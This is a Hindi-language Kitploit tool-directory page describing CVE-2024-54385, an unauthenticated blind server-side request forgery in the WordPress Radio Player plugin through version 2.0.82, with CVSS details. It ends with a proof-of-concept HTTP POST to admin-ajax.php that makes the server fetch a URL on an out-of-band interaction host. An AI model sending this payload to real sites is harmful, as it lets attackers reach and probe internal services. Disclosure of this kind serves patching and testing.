Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-54385 — रेडियो प्लेयर <= 2.0.82 - ब्लाइंड अनऑथेंटिकेटेड सर्वर-साइड रिक्वेस्ट फोर्जरी | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-54385
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubrandomrobbiebf/cve-2024-54385

CVE-2024-54385

रेडियो प्लेयर <= 2.0.82 - ब्लाइंड अनऑथेंटिकेटेड सर्वर-साइड रिक्वेस्ट फोर्जरी

रिपॉजिटरी देखें
41 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-54385

रेडियो प्लेयर <= 2.0.82 - अनधिकृत सर्वर-साइड रिक्वेस्ट फोर्जरी

विवरण

रेडियो प्लेयर – लाइव शाउटकास्ट, आइसकास्ट और वर्डप्रेस के लिए कोई भी ऑडियो स्ट्रीम प्लेयर नामक वर्डप्रेस प्लगइन 2.0.82 तक (2.0.82 सहित) के सभी संस्करणों में सर्वर-साइड रिक्वेस्ट फोर्जरी के प्रति संवेदनशील है। यह अनधिकृत हमलावरों के लिए वेब एप्लिकेशन से उत्पन्न होने वाले मनमाने स्थानों पर वेब अनुरोध करना संभव बनाता है, जिसका उपयोग आंतरिक सेवाओं से जानकारी क्वेरी करने और संशोधित करने के लिए किया जा सकता है।

विवरण

  • प्रकार: प्लगइन
  • Slug: radio-player
  • प्रभावित संस्करण: 2.0.82
  • CVSS स्कोर: 7.2
  • CVSS रेटिंग: उच्च
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  • CVE: CVE-2024-54385
  • स्थिति: सक्रिय

POC

POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8
टूल डाउनलोड करें